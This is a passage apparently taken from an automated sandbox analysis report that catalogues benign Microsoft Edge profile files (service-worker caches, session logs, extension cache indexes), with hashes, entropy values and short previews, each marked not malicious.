SHA1:	F74A44508DBEF8897FF1AA3007B708B9FDF0C45D
SHA-256:	78C75EAAB4EF98367E73E57474D1EEBA1EF06D0DD2BCDF52DE7CEBCD912D6E70
SHA-512:	8B21828C656BED22A59CEAB4101EB97C0A25FCE3F9D14135D4136A6F67E4FBA61F82DC36B796B457FD3CDCA6662A15FAA6C61EE67B1A162BC72594FC593ABB4D
Malicious:	false
Preview:	2024/11/01-15:58:18.131 1ed4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/01-15:58:18.187 1ed4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	113447
Entropy (8bit):	5.577684631877201
Encrypted:	false
SSDEEP:	1536:UU906yxPXfOxr1lhCe1A46rCjQ3NGVVlAGahiSL/r4L/rqN:59LyxPXfOxr1lMe1Z6rFprZL/ML/A
MD5:	AB31CEDDE6F96ED0490A48547B27F034
SHA1:	1252C44138C3EB65473DB27FECE7D698DED740FF
SHA-256:	00F1E1976EFFDFA86FB0DC11CD26F0E258F4888CF91E77625C308EB6837FDFCE
SHA-512:	4BE874FB3E5D31F52E33312EC3B2E705D8D8F308FFDB0079FDFF693326BDB435D570CFB254843DC09B2C20A3EBA997BD9E68290C0616F08229E340CFE0806F5E
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	187273
Entropy (8bit):	6.416667297580169
Encrypted:	false
SSDEEP:	3072:6EIuW5dfdbbuS2u61GM7rb/gSDqlbtb9L/R6Qt:6EW12Pu6IyZulBZL/h
MD5:	50D0C8448DA223FE4E0DEDC027993EF4
SHA1:	95D1C53557D8B9C1D78CA85D7291A73F6FF466C3
SHA-256:	24F3FA43B40383D3E589FF17AE65D55ACB0FC8B9205B625BD65680029E02838F
SHA-512:	9B8AB15B20BB4A0AEEF1056C2CF71BE95D700678C0796FA3827D574654EAC75B7189CE5CA72C4BBADB2A73D6F63225C7256553DAA4B8D2C9B164BF8462F5ED01
Malicious:	false
Preview:	0\r..m..........rSG.....0....Pfg......?.Y>...n:,.8........$S.8..`,.....L`.....$S...`......L`......Qcnk9.....exports...Qc.Ld....module....Qc.P.h....define....Qb..E ....amd....D..H.............".. ...".. ...!...`..2....\".. ...!...-.....!...z..b.....=`...7u............).........".. ...!........./..4.....).......$Rb............I`....Da......... ..f..........`...p...0...j......@......q.P.m.....b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........D`....D`....D`.....A..%.`............$S.,.`......L`.....$S..`R....DL`.....DRb..............Qb...e....e.....Qb.4......t.....Qb......s.....Qb.+/d....n...c................I`....Da....pR...$S.`.`z.....L`..........a............a........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:LhN00EOX1Jn:Dg4jn
MD5:	B7C466E19B0D1C4DA109B1D49402A839
SHA1:	71D13C04CC0AFF33B3FEBEC89A1F52DAA892A0B8
SHA-256:	BB8A79BD4135640FC9C871DC5CB9DA58E3986EF058001ED6F50A3C7A909C3F19
SHA-512:	E9C91A61E02B5EF70236B5443B2EB314CC186A31400260D6FD6E42A957D305E576EB58C1128775B777C7C74C1A6970C7DA340A1602F7DBDCB4153ED7F040BBA2
Malicious:	false
Preview:	(......boy retne............................u./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:LhN00EOX1Jn:Dg4jn
MD5:	B7C466E19B0D1C4DA109B1D49402A839
SHA1:	71D13C04CC0AFF33B3FEBEC89A1F52DAA892A0B8
SHA-256:	BB8A79BD4135640FC9C871DC5CB9DA58E3986EF058001ED6F50A3C7A909C3F19
SHA-512:	E9C91A61E02B5EF70236B5443B2EB314CC186A31400260D6FD6E42A957D305E576EB58C1128775B777C7C74C1A6970C7DA340A1602F7DBDCB4153ED7F040BBA2
Malicious:	false
Preview:	(......boy retne............................u./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	204
Entropy (8bit):	4.647334708245801
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljljlAildllaV93Gauq3ET2HLPN3VedUV:S85aEFljljlAillaV93McESrP+dUV
MD5:	771DDD91F4EE9468C76DAC90A6AABFC7
SHA1:	E9BF323DDA881DA86BED88ABC645881CC71CC3EB
SHA-256:	16A8DD4677A7FDA6C4F4AA66C2EB21F3843CD985F16C8BE81B6EB43E659EA95F
SHA-512:	DD2B1AE697A6E1F87B34953A4CB1DB0C842C6D7ABBC8958A5CD926DCE10FB114B10FB9E1AF1C367417A065C04B2E6645E41591A7AF93C35A57B60B7FB0C440BF
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f...................b................next-map-id.1.Cnamespace-c9e2a2d0_30c2_49d1_8031_645b9b17bc5f-https://ntp.msn.com/.0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.17179450075519
Encrypted:	false
SSDEEP:	6:H+pL3M+q2PCN23oH+TcwtrQMxIFUt8Y+pL5FZmw+Y+pL5AMVkwOCN23oH+Tcwtrb:EjM+v1YebCFUt8z//+zSMV5eYebtJ
MD5:	CBC9B1D0443F9F849D13158A7DAD8611
SHA1:	BE4C7CE0410939797D391C9E3F122C6F8C5EF408
SHA-256:	834E76B0D8160BDE406C85C76F7616D6509F9C437198C8029F3DA43380ADF9CD
SHA-512:	53355CD9E3D74F6049A35CBD4BF583687B7D5B3372BD7A64660596FC8AD47A4DAF20E111908A61B5DD80FD8326F9C9D6C555402C853298B23D888D8D6339B4DD
Malicious:	false
Preview:	2024/11/01-15:58:13.562 1dfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/01-15:58:13.563 1dfc Recovering log #3.2024/11/01-15:58:13.563 1dfc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.17179450075519
Encrypted:	false
SSDEEP:	6:H+pL3M+q2PCN23oH+TcwtrQMxIFUt8Y+pL5FZmw+Y+pL5AMVkwOCN23oH+Tcwtrb:EjM+v1YebCFUt8z//+zSMV5eYebtJ
MD5:	CBC9B1D0443F9F849D13158A7DAD8611
SHA1:	BE4C7CE0410939797D391C9E3F122C6F8C5EF408
SHA-256:	834E76B0D8160BDE406C85C76F7616D6509F9C437198C8029F3DA43380ADF9CD
SHA-512:	53355CD9E3D74F6049A35CBD4BF583687B7D5B3372BD7A64660596FC8AD47A4DAF20E111908A61B5DD80FD8326F9C9D6C555402C853298B23D888D8D6339B4DD
Malicious:	false
Preview:	2024/11/01-15:58:13.562 1dfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/01-15:58:13.563 1dfc Recovering log #3.2024/11/01-15:58:13.563 1dfc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13374964695641695

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1311
Entropy (8bit):	3.503095624716661
Encrypted:	false
SSDEEP:	24:3i6cuP9L0r8DpsAFLrrCLp3k2amEtLql2zU1SRodllQUSkOAv:3i6R0YzFuLpVFERu2zU+oWqOK
MD5:	0FF943653B2FACD59CCF7674689ADF64
SHA1:	40150256F497D26592D3C8043F26D282A83065C5
SHA-256:	BBA87F230D276911F344F601CE3541C80C904E2783180A2D0D1EA0C27C43A5B3
SHA-512:	491D3C34A050D4F01579BC4AB03581F0493DB963F5F71DEDC48B5FF0B8C1DD731044A3D36B612D4777E8B77A5C58D63CDE3194F5FECF851C009622BBC75BECCC
Malicious:	false
Preview:	SNSS................................"........9.#4.......$...b21c20a4-fafe-44a6-b8ef-6280b9f66728........................................................!.............................................1..,.......$...c9e2a2d0_30c2_49d1_8031_645b9b17bc5f......................D............................................edge://newtab/......N.e.w. .t.a.b...........................................................x...............X...............`...............X........i.Z.%...i.Z.%......................................................................j...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.U.S.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.&.O.C.I.D.=.M.N.H.P._.U.5.3.1.....................................8.......0.......8....................................................................... .......................................................P...$...0.9.8.3.2.4.2.a.-.7.9.e.c.-.4.d.d.3.-.b.8.f.9.-.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13374964696082910

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	3985
Entropy (8bit):	3.93703447255499
Encrypted:	false
SSDEEP:	96:3c+hF0wD8WQpV8UIoQUbXf6sKy7s+WBs4aVj:31gwDI8xoBbXfUlaVj
MD5:	3CB8715E8505E106C013453869873468
SHA1:	8CD44DB21343EA7E10D0AB7B62CEC4F57F12163A
SHA-256:	A1E302732C1A9591B12A2C7C233179F1404D0A51B2D0CC4375D3D414E1712F20
SHA-512:	7FC6A51272911C05BE22BF277E274BE91E666B09A6537E2B918E5409E894592001110BFF4404B387DCAB0C8B27F431321F02DECFE3156A807FD28EEEC56C80B0
Malicious:	false
Preview:	SNSS.................d^.`/.q..l...............https://www.bing.com/search?q=regedikt&form=WNSGPH&qs=SW&cvid=1c4c2e2811e44c03a63aad6fcf391716&pq=regedikt&cc=GB&setlang=en-US&wsso=Moderate....r.e.g.e.d.i.k.t. .-. .S.e.a.r.c.h...........................................................x...............................................h..........2......2...........................x....................................... .......h.t.t.p.s.:././.w.w.w...b.i.n.g...c.o.m./.s.e.a.r.c.h.?.q.=.r.e.g.e.d.i.k.t.&.f.o.r.m.=.W.N.S.G.P.H.&.q.s.=.S.W.&.c.v.i.d.=.1.c.4.c.2.e.2.8.1.1.e.4.4.c.0.3.a.6.3.a.a.d.6.f.c.f.3.9.1.7.1.6.&.p.q.=.r.e.g.e.d.i.k.t.&.c.c.=.G.B.&.s.e.t.l.a.n.g.=.e.n.-.U.S.&.w.s.s.o.=.M.o.d.e.r.a.t.e.................................................0.......H.......X.......x...............................................................8.......P.......h.......................................................h...0.......?.%. .B.l.i.n.k. .s.e.r.i.a.l.i.z.e.d. .f.o.r.m. .s.t.a.t.e. .v.e.r.s.i.o.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.4418480883730883
Encrypted:	false
SSDEEP:	12:TLiN/cUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLiBVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	444C697E8AF5C7ABF6A576C698CCDAE6
SHA1:	7E6455ED6A534CCBDE446B25CB8A387E40A74BBA
SHA-256:	7401AE966CB49B237B8F07B23585BC3D1961C0F5762A43E2796776F870E09297
SHA-512:	B2E03753CE8D60980984769A7778F8F93B9E2B84B9A7FFD0F04759159F69C98FC1AED0EAECF9CF044B9BE2D3490C61CECE7E618F91B1398BCCA809AE7D9BF32C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.150461382097937
Encrypted:	false
SSDEEP:	6:H+pLieyq2PCN23oH+Tcwt7Uh2ghZIFUt8Y+pLiI1Zmw+Y+pLOVjRkwOCN23oH+T8:E+v1YebIhHh2FUt8zl1/+zS5eYebIhHd
MD5:	F4956A7DFAD9A1356EADC17300134838
SHA1:	6DD6F711E4DD18BD608B5032D98DB70F6E8F3225
SHA-256:	475E3752BF4B17EFA5BC143F0171B3CE1FD375BA65A121EEE99B782B0BF0EAFE
SHA-512:	75155AC334BDA95ED2EDA38483B54D66852CAC7D6871D569CA1B2D56853256392956C0FD5E5A8264B6B68F1CA9C005FA67BB459C06D8A48B654AB34D7A9EA0C0
Malicious:	false
Preview:	2024/11/01-15:58:13.085 2270 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/01-15:58:13.085 2270 Recovering log #3.2024/11/01-15:58:13.086 2270 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.150461382097937
Encrypted:	false
SSDEEP:	6:H+pLieyq2PCN23oH+Tcwt7Uh2ghZIFUt8Y+pLiI1Zmw+Y+pLOVjRkwOCN23oH+T8:E+v1YebIhHh2FUt8zl1/+zS5eYebIhHd
MD5:	F4956A7DFAD9A1356EADC17300134838
SHA1:	6DD6F711E4DD18BD608B5032D98DB70F6E8F3225
SHA-256:	475E3752BF4B17EFA5BC143F0171B3CE1FD375BA65A121EEE99B782B0BF0EAFE
SHA-512:	75155AC334BDA95ED2EDA38483B54D66852CAC7D6871D569CA1B2D56853256392956C0FD5E5A8264B6B68F1CA9C005FA67BB459C06D8A48B654AB34D7A9EA0C0
Malicious:	false
Preview:	2024/11/01-15:58:13.085 2270 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/01-15:58:13.085 2270 Recovering log #3.2024/11/01-15:58:13.086 2270 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	524656
Entropy (8bit):	5.027445846313988E-4
Encrypted:	false
SSDEEP:	3:LsFlPldha:LsFba
MD5:	60A5082193EBD8009E72CC7D8D1CE222
SHA1:	3FB1AF12AD91171039CF77715DCEA6BA63CF4036
SHA-256:	7AA4F0245FC97AC11B570D6B909F52B22B74E0855545B8599D3F7FDC76561056
SHA-512:	11EBBFA8C1BC33817F331F1B44FC2A682ECDD4456DE78EE26C2750FA3F2AD17A19CF3754A6A079B3E50A1E39E4CF42F8B4966299D5E881640AB2A4E60432F60A
Malicious:	false
Preview:	........................................#...u./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:ib00EfDBJ:iUfdJ
MD5:	A7163B9A233A5B166A9D013DD52A89A1
SHA1:	008A8DAE760D268BB6E4C01A62750BC1B8B28B50
SHA-256:	DE1B8EDF59D7159E804C8B42FFC64E090F87F727E271DA3A17D3CF4687F6CDD9
SHA-512:	D3368BD38E20D19B20F848BAE31A55B61FA445764D0052997EB80D51F4852BF20E55C84D91F901103BCE71191024ABC4E45E690DD31BC6AC76B2A4D42A505B8A
Malicious:	false
Preview:	(.......oy retne..........................s.u./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:ib00EfDBJ:iUfdJ
MD5:	A7163B9A233A5B166A9D013DD52A89A1
SHA1:	008A8DAE760D268BB6E4C01A62750BC1B8B28B50
SHA-256:	DE1B8EDF59D7159E804C8B42FFC64E090F87F727E271DA3A17D3CF4687F6CDD9
SHA-512:	D3368BD38E20D19B20F848BAE31A55B61FA445764D0052997EB80D51F4852BF20E55C84D91F901103BCE71191024ABC4E45E690DD31BC6AC76B2A4D42A505B8A
Malicious:	false
Preview:	(.......oy retne..........................s.u./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9555576533947305
Encrypted:	false
SSDEEP:	3:DTDR0ESY:T9X
MD5:	EEDE319D1C919D15785C2633F89B0A8E
SHA1:	0AEA3A283740C95198360F8C1D0911831D8800A5
SHA-256:	A5570763452A77B06D4CBE27D87EA7DBA3372D57389472EFFFAC55CC1DCA98DC
SHA-512:	8781201B4AC18B3FD70B2AD8590AB3E3AA56E620C4FBFDDAFE6805FAC4977549FC9569327C8085340619BCD726E8802A19180A7D75EE02835F94C8389D6E656F
Malicious:	false
Preview:	(...^}..oy retne.........................`t.u./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9555576533947305
Encrypted:	false
SSDEEP:	3:DTDR0ESY:T9X
MD5:	EEDE319D1C919D15785C2633F89B0A8E
SHA1:	0AEA3A283740C95198360F8C1D0911831D8800A5
SHA-256:	A5570763452A77B06D4CBE27D87EA7DBA3372D57389472EFFFAC55CC1DCA98DC
SHA-512:	8781201B4AC18B3FD70B2AD8590AB3E3AA56E620C4FBFDDAFE6805FAC4977549FC9569327C8085340619BCD726E8802A19180A7D75EE02835F94C8389D6E656F
Malicious:	false
Preview:	(...^}..oy retne.........................`t.u./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
